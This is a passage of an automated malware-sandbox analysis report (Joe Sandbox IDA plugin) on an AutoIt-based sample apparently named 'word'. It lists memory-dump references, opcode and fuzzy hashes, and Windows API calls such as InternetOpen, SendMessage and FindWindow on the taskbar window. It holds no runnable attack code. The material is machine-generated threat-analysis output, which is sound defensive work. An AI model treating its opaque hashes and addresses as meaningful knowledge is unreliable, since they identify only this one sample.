                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMenuPopup
                                                                    • String ID: X1
                                                                    • API String ID: 3826294624-2397719451
                                                                    • Opcode ID: 6cc80276a77257b4a7440ecd59e59889850be4016b64337e7ed00362276ef1a5
                                                                    • Instruction ID: 7f91a4590d0182010b64de3f09e19208a551650f1ca78392937ca0f6ec2af794
                                                                    • Opcode Fuzzy Hash: 6cc80276a77257b4a7440ecd59e59889850be4016b64337e7ed00362276ef1a5
                                                                    • Instruction Fuzzy Hash: CC21AC35600201CFE724CF28D084BABB3E1BBAA324F14841FE59887360CB7568CACB65
                                                                    APIs
                                                                    • DefDlgProcW.USER32(?,00000114,00000000,?,?,?,?,?,004A83D8,?), ref: 00469A31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Proc
                                                                    • String ID: X1
                                                                    • API String ID: 2346855178-2397719451
                                                                    • Opcode ID: dc39a28d6584410e7e9d39be8fdef0c21f65586a3d31f41dfecdd17b11510ed2
                                                                    • Instruction ID: 5414628f158ba78a046d4a24b655e4ccbf4c8d46c3d310d0e0a8d963d1b880b8
                                                                    • Opcode Fuzzy Hash: dc39a28d6584410e7e9d39be8fdef0c21f65586a3d31f41dfecdd17b11510ed2
                                                                    • Instruction Fuzzy Hash: B4115932700150ABE610CA59EC44E7BB79DEBCA725F14815FF68093282DBB96C05D77B
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: htonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 3832099526-2422070025
                                                                    • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                    • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                    • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                    • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 455545452-1403004172
                                                                    • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                    • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                    • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                    • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: <local>
                                                                    • API String ID: 2038078732-4266983199
                                                                    • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                    • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                    • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                    • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 455545452-1403004172
                                                                    • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                    • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                    • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                    • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID: X1
                                                                    • API String ID: 410705778-2397719451
                                                                    • Opcode ID: f1a10e336183c0ff2b6d957fcf18a3a835ea54dd3f96ed3d36d0cc8343e646a5
                                                                    • Instruction ID: ba536238118c8d010d3f6b0aa660f9f8498b4d39804cd88edc9aab5a1a4e475f
                                                                    • Opcode Fuzzy Hash: f1a10e336183c0ff2b6d957fcf18a3a835ea54dd3f96ed3d36d0cc8343e646a5
                                                                    • Instruction Fuzzy Hash: 4A115E316402019FD320CF69DCC0E67B7A9FB8A324F64861EE564873A1C771A895CB64
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 455545452-1403004172
                                                                    • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                    • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                    • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                    • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00447AE5
                                                                    • DefDlgProcW.USER32(?,0000002B,?,?,004A83D8,?), ref: 00447B09
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageProcSend
                                                                    • String ID: X1
                                                                    • API String ID: 650375871-2397719451
                                                                    • Opcode ID: 282f86207f84fb720c1c146b20eb36cb5bd987ddbd5c6a609029bff053d642d3
                                                                    • Instruction ID: cf0c3d739a266ecf9dfb39524e393d8b6385858120b34e0c7784725de632f42e
                                                                    • Opcode Fuzzy Hash: 282f86207f84fb720c1c146b20eb36cb5bd987ddbd5c6a609029bff053d642d3
                                                                    • Instruction Fuzzy Hash: 8F01DB323002509BD320DF48D888F6BB769EBDA725F14492EFA409B280C7B5B806C775
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _strncmp
                                                                    • String ID: ,$UTF8)
                                                                    • API String ID: 909875538-2632631837
                                                                    • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                    • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                    • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                    • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _strncmp
                                                                    • String ID: ,$UTF8)
                                                                    • API String ID: 909875538-2632631837
                                                                    • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                    • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                    • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                    • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                    • wsprintfW.USER32 ref: 004560E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_mallocwsprintf
                                                                    • String ID: %d/%02d/%02d
                                                                    • API String ID: 1262938277-328681919
                                                                    • Opcode ID: 28fb1a02a7122afbd4fb513567648ab8d06d1828bdf334b0f31f4cbdb19ab7aa
                                                                    • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                    • Opcode Fuzzy Hash: 28fb1a02a7122afbd4fb513567648ab8d06d1828bdf334b0f31f4cbdb19ab7aa
                                                                    • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                    APIs
                                                                    • FindWindowW.USER32 ref: 0044226C
                                                                    • PostMessageW.USER32 ref: 0044227F
                                                                      • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                    • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                    • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                    • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                    APIs
                                                                    • FindWindowW.USER32 ref: 00442240
                                                                    • PostMessageW.USER32 ref: 00442247
                                                                      • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                    • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                    • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                    • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                    APIs
                                                                    • MessageBoxW.USER32 ref: 00439522
                                                                      • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Message_doexit
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 1993061046-4017498283
                                                                    • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                    • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                    • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                    • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E